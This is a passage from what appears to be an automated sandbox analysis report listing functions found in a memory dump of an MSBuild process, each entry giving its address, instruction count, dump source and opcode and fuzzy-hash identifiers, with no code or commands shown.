                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction Fuzzy Hash: 9301D23A600106AFFB26AF59C800F5B7AA9FB51754F05802AEE15AB274E771DD40CB90
                                                                                                              Function 0138A250 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction ID: be9414846049d4d29797b27629fdd7b072180a02418a168588ecac2345a2e689
                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction Fuzzy Hash: 020149324047259BCB319F19D840A727BF8FF55764700866EFD958B681D332D400CB60
                                                                                                              Function 01464940 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ebacf6d306f957ce83c9f8b6b1758c173058f1baaf5ca72b2d206be0ac5efc3
                                                                                                              • Instruction ID: 8a2dad72547a472c9634afce50f2983466d1b21a9c0fc0c936f7846f42d0d271
                                                                                                              • Opcode Fuzzy Hash: 2ebacf6d306f957ce83c9f8b6b1758c173058f1baaf5ca72b2d206be0ac5efc3
                                                                                                              • Instruction Fuzzy Hash: DE0126325811019FCB32DF2CC800E13BBACEB81378B194216E9A89B2B2D730DC05CBC1
                                                                                                              Function 0140E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dee292219dd50a718a17fee8a678496353812ad4bf5b3d7e14a0e8ea69ccbcf9
                                                                                                              • Instruction ID: 9b99f057a60759ecb274d9a37532cd0fe88492c0de3462bce521cb45a3302d35
                                                                                                              • Opcode Fuzzy Hash: dee292219dd50a718a17fee8a678496353812ad4bf5b3d7e14a0e8ea69ccbcf9
                                                                                                              • Instruction Fuzzy Hash: EE11AD32241641EFDB16EF1ADD80F56BBB8FF54B88F200479EA059B6A1C635ED01CA90
                                                                                                              Function 01396259 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8081c1bf24d8205cdfbe37f39d2f4c98c0a26f2acfa4a9d970016b8d50f3166c
                                                                                                              • Instruction ID: a58d1b3adbe687aee15a07a2e9c90ae23b1e0a5601c9f9b7b04c3c436fa503b2
                                                                                                              • Opcode Fuzzy Hash: 8081c1bf24d8205cdfbe37f39d2f4c98c0a26f2acfa4a9d970016b8d50f3166c
                                                                                                              • Instruction Fuzzy Hash: 21117CB1542229ABEF25EB68CD42FE9B374BF04718F5041D4A358A60E0DB709E81CF84
                                                                                                              Function 01416050 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb71de07a2d72d3c51666bd3680b57fb3c0845545bf8ff37d6b68bcd924e1e12
                                                                                                              • Instruction ID: 551347182664f92c05e28e6fbefc6911871859adbe03847981eefb2a4e2ca581
                                                                                                              • Opcode Fuzzy Hash: cb71de07a2d72d3c51666bd3680b57fb3c0845545bf8ff37d6b68bcd924e1e12
                                                                                                              • Instruction Fuzzy Hash: A5112DB3900019ABCB11DB98CC80DEF7B7CEF48258F054166E906E7211EA34EA55CBE0
                                                                                                              Function 0139208A Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction ID: 31f52ccc4641766fcbd2a45b9377da2055f9e9c19542b373d9f0e83e2e9f8afa
                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction Fuzzy Hash: 7501F5336006119BEF159A5DD884A93776ABFC4708F5640A5ED018F356EAB1C881C390
                                                                                                              Function 01426500 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c8a41f49333392c9cc11714a2ecbe913787c8736f408f455d5776bda0790826a
                                                                                                              • Instruction ID: 9fe6467c1cfcea13806ec11475b9c0bfd037cd48563540e6b5cdb473b8e5f5e7
                                                                                                              • Opcode Fuzzy Hash: c8a41f49333392c9cc11714a2ecbe913787c8736f408f455d5776bda0790826a
                                                                                                              • Instruction Fuzzy Hash: 1711A1326441569FD711CF58E800BA6BBB9FB5A314F49819AED488B325D732ECC1CBA0
                                                                                                              Function 0141C810 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c341dffa1a793c2d737e0a270825f9c55f6e8e7072341aef3e1ca4d43f0d7c5
                                                                                                              • Instruction ID: e36e4ef1c7636322748dc4b696cb70c5bbf3c1bc42cd7380cd1c3066c51c6923
                                                                                                              • Opcode Fuzzy Hash: 0c341dffa1a793c2d737e0a270825f9c55f6e8e7072341aef3e1ca4d43f0d7c5
                                                                                                              • Instruction Fuzzy Hash: 1911ECB1E002099FCB04DF99D585A9EB7F4FF58354F10406AA905E7355D674EE018BA4
                                                                                                              Function 0143EA60 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 26a10a45568fd5e47749b5bb190782ac34c67ec5a0d5b74e563a71b1f937c338
                                                                                                              • Instruction ID: e618ba22b45dd38744fdadf5591d8c9c2ff9d3a2542de07f7ec583816438c922
                                                                                                              • Opcode Fuzzy Hash: 26a10a45568fd5e47749b5bb190782ac34c67ec5a0d5b74e563a71b1f937c338
                                                                                                              • Instruction Fuzzy Hash: 7201B1315422119BCB32BE19844092BBBA9FFD5654B45842FF2456B761CB30DC43CB91
                                                                                                              Function 0138C020 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction ID: 90cd1078938e3629e1be547a6a11f1b39b014150e7d56b241ccc3adc8c4d236d
                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction Fuzzy Hash: EF01B972100705DFDB22A7AAC444AA777EDFFD575CF04441DA9458B990DB70E502C760
                                                                                                              Function 013D20F0 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb32c35ec1180d1dea881d2547c91149b6428e632d2f2c9791d68630c16fe35f
                                                                                                              • Instruction ID: f2568818a823681ebe971fc604054e4e58f2abc159e4fc01f4d4d5f806ed0cbb
                                                                                                              • Opcode Fuzzy Hash: eb32c35ec1180d1dea881d2547c91149b6428e632d2f2c9791d68630c16fe35f
                                                                                                              • Instruction Fuzzy Hash: D7116D76A0020DAFCB05DFA8D850EAF7BB9EB44344F108069E9019B290E635AE11CB90
                                                                                                              Function 013CE5CF Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e181c6b1da05d3908b5caddef27a9f407f06e0b3adf8c4ca86475a31348be51
                                                                                                              • Instruction ID: a2167c4b302680ff2f61c7666ca18b0ef8f8d5a660fb2027da901beee99a2cff
                                                                                                              • Opcode Fuzzy Hash: 7e181c6b1da05d3908b5caddef27a9f407f06e0b3adf8c4ca86475a31348be51
                                                                                                              • Instruction Fuzzy Hash: A701D4B1601901BFC611BB2ECD80E57BBACFB54658B00052AB20983A61DB34EC01C6A0
                                                                                                              Function 014269C0 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 46df708ed3da598b3a1100dcb3ab7d955d5992a243282fe85791a633d845c4b8
                                                                                                              • Instruction ID: a1717b10c3525642386878b35c48c232d5da7f1478f8b82ba761127f2ca5fb4e
                                                                                                              • Opcode Fuzzy Hash: 46df708ed3da598b3a1100dcb3ab7d955d5992a243282fe85791a633d845c4b8
                                                                                                              • Instruction Fuzzy Hash: A9014C32314212DBC320DF6DD88896BFBA8FF45624F51412AED58872D0EB309941C7D1
                                                                                                              Function 0141C460 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf358efd12a40f3d40299a0d68da60131d1a651c01bb58ba4224a56e03bc3fd3
                                                                                                              • Instruction ID: 5ca451346ab5a8816cfd33eec3ac1e9c83db06adeb6edc6b7014c717a29ce57c
                                                                                                              • Opcode Fuzzy Hash: cf358efd12a40f3d40299a0d68da60131d1a651c01bb58ba4224a56e03bc3fd3
                                                                                                              • Instruction Fuzzy Hash: DC115B75A40209EBDB15EFA8D884EAE7BB6EB58354F00406AFD0197364DA34E911CB90
                                                                                                              Function 0141C97C Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60a53546bd01b4ac06b55a9af901252ffd90b2b13bd25664b4f6fea33d66a6a1
                                                                                                              • Instruction ID: 1476a0b2c6a52851311cb830292f214b1e0475000b4a6e962e1ad137b9623f72
                                                                                                              • Opcode Fuzzy Hash: 60a53546bd01b4ac06b55a9af901252ffd90b2b13bd25664b4f6fea33d66a6a1
                                                                                                              • Instruction Fuzzy Hash: 931139B2618349DFC700DF6DD88195BBBE4EF98710F00851EB998D73A5E630E901CB96
                                                                                                              Function 0141CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a226a62b9585d83ee0ac679e657f0b2f519a2680d7466c49ea84114fdc70084c
                                                                                                              • Instruction ID: e2c3e29baefd3713ec0e3e1f9a4a656d452058ec5c85aa8bc1a191d7ef04f314
                                                                                                              • Opcode Fuzzy Hash: a226a62b9585d83ee0ac679e657f0b2f519a2680d7466c49ea84114fdc70084c
                                                                                                              • Instruction Fuzzy Hash: 7A1139B26183099FC710DF6DD881A5BBBE4FF99750F00851EB958D73A4E630E901CB96
                                                                                                              Function 013AE016 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction ID: ad063f13539b241a081ba7bdb0c81f22da435ae5c4f612cf400be0031960ef9b
                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction Fuzzy Hash: 660156322406849FE326C71EC948F26BBECEB54758F4904A2E909CBAA1D668DC40C761
                                                                                                              Function 0138826B Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e56c1ed4668354b5d0865b66858d6bb1de60e8fe2aa2c7cd76952fbce5700bc7
                                                                                                              • Instruction ID: 39a01b3a84668ff15769b3adfbeb405ddc005f7447c04a4cfab5356fced66ef4
                                                                                                              • Opcode Fuzzy Hash: e56c1ed4668354b5d0865b66858d6bb1de60e8fe2aa2c7cd76952fbce5700bc7
                                                                                                              • Instruction Fuzzy Hash: C1018432700709DBDB14FB6EDC449AE77A9FF50618B55406ADA01A7698DE30DD02C690
                                                                                                              Function 0143EB50 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 167998413faa42dfab93fa89ac04b557ec59ed81c1dd8d319a729b3600e6d59e
                                                                                                              • Instruction ID: af543c99686b9248642461d2f0eb0bc66ce7a2fecb04e96dc383664f11b46e6f
                                                                                                              • Opcode Fuzzy Hash: 167998413faa42dfab93fa89ac04b557ec59ed81c1dd8d319a729b3600e6d59e
                                                                                                              • Instruction Fuzzy Hash: 030184712816019FD336AF1AD840F0BBAA8EF55F54F11442EB6159B3A0D6B0D8418B54
                                                                                                              Function 01392582 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 704cb069f1006b116d2285e212c44b21a5a40b96e4b5799243b663839ff119d2
                                                                                                              • Instruction ID: 9cbccb28e5df3af17d462ffc457a3a20d4459422cef2237d7057add7f61f1d9f
                                                                                                              • Opcode Fuzzy Hash: 704cb069f1006b116d2285e212c44b21a5a40b96e4b5799243b663839ff119d2
                                                                                                              • Instruction Fuzzy Hash: ECF0A933A41B11B7CB31DB5A8D40F57BEADEB84B94F154029A60597650D670DD01D6A0
                                                                                                              Function 013BC073 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: 1a16b118304bcb10492fa9e131d94bc1c9f2fa89239b927a0eb9f193dabba953
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: 64F062B3600615ABD334CF4DDC40F97FBEADBD5A94F058129A659DB220EA31DD05CB90
                                                                                                              Function 0146634F Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d043a6120c318be3835abf302c985f68bfc850e43052948dfb28019a83b9c4db
                                                                                                              • Instruction ID: ddb5cf5281db2e18049a857b588fe8227561a244c694fad5f1a49887c1ee00fa
                                                                                                              • Opcode Fuzzy Hash: d043a6120c318be3835abf302c985f68bfc850e43052948dfb28019a83b9c4db
                                                                                                              • Instruction Fuzzy Hash: 37012CB2A10209EFDB04DFADE551AAEB7F8FF58304F10406AE905E7350D6749A018BA5
                                                                                                              Function 0138C310 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: e8bb09e37eee99e94393550dd78630e6010aa61322aa1b8dbe976fa149708c0c
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: 64F0C873204722ABD732375D4840BEBB9998FE1A6CF1A1035E2099B641C9A8CE0396F0
                                                                                                              Function 0146625D Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fdf48de29c169e72766feab623f0e71ccf2ea225a578dde7c2e04edb75a8529f
                                                                                                              • Instruction ID: 92521ee2f44cb45241f308e55d2912fae47e058fcf129ba4e371f2b0730de781
                                                                                                              • Opcode Fuzzy Hash: fdf48de29c169e72766feab623f0e71ccf2ea225a578dde7c2e04edb75a8529f
                                                                                                              • Instruction Fuzzy Hash: 04012171A10209EFCB04DFA9D4519AEB7F8EF58304F10406AF905E7351D67499018BA5
                                                                                                              Function 014662D6 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 51010909cc24592503ee04eacdb704916c4311fac539c19aba422da92a030b10
                                                                                                              • Instruction ID: 9a804f04b0d6efa8153907b0353505ecc88e383c7474f4e9dab05e77069b8e98
                                                                                                              • Opcode Fuzzy Hash: 51010909cc24592503ee04eacdb704916c4311fac539c19aba422da92a030b10
                                                                                                              • Instruction Fuzzy Hash: 650121B1A00209EFDB04DFA9E44599EB7F8EF58304F50406AE915E7350D6749D018BA5
                                                                                                              Function 013CCA6F Relevance: .0, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction ID: ab2d0912fa5b7d0805472f574e8379f53058ef5c9529f70f5ed4ab7a65eb0a49
                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction Fuzzy Hash: 7C01D636604686EBE323D65EC909B5ABB98EF51B58F09407AFA488B7A1E674C800C351
                                                                                                              Function 014661E5 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7691aa003115f002f88363b8c3a7c167372ad48986293a8974047f4cae8ba11
                                                                                                              • Instruction ID: 9d360b9cb0a1f532dcf1f30abe3ac0ec0d6091ddb850cd644c1871794c5d7262
                                                                                                              • Opcode Fuzzy Hash: e7691aa003115f002f88363b8c3a7c167372ad48986293a8974047f4cae8ba11
                                                                                                              • Instruction Fuzzy Hash: 21012C71A00249ABDB04DFA9E445AAEBBB8EF58314F14405AE901A7290E774AA01CB95
                                                                                                              Function 014163C0 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction ID: bf17cf775852f487acfdd53c73d6f651db1d2fe504bfb717b56bd8aa5806c952
                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction Fuzzy Hash: 9AF01D7220001DBFEF019F95DD80DEF7B7EFB59298B114125FA1192160D671DD21ABA0
                                                                                                              Function 0141A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32d8e83c49b001f1f877e4de68dc4c266e99af811573e98ea36be19efb8394cb
                                                                                                              • Instruction ID: db2dc3bbbc25a305f3612b99a24bdb1c2a0b85b572ca04873e18c73b6c51822d
                                                                                                              • Opcode Fuzzy Hash: 32d8e83c49b001f1f877e4de68dc4c266e99af811573e98ea36be19efb8394cb
                                                                                                              • Instruction Fuzzy Hash: 44018536105249EBCF129E84D840EDE7F66FB4C6A8F068116FE1966224C736D971EB81
                                                                                                              Function 0138C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
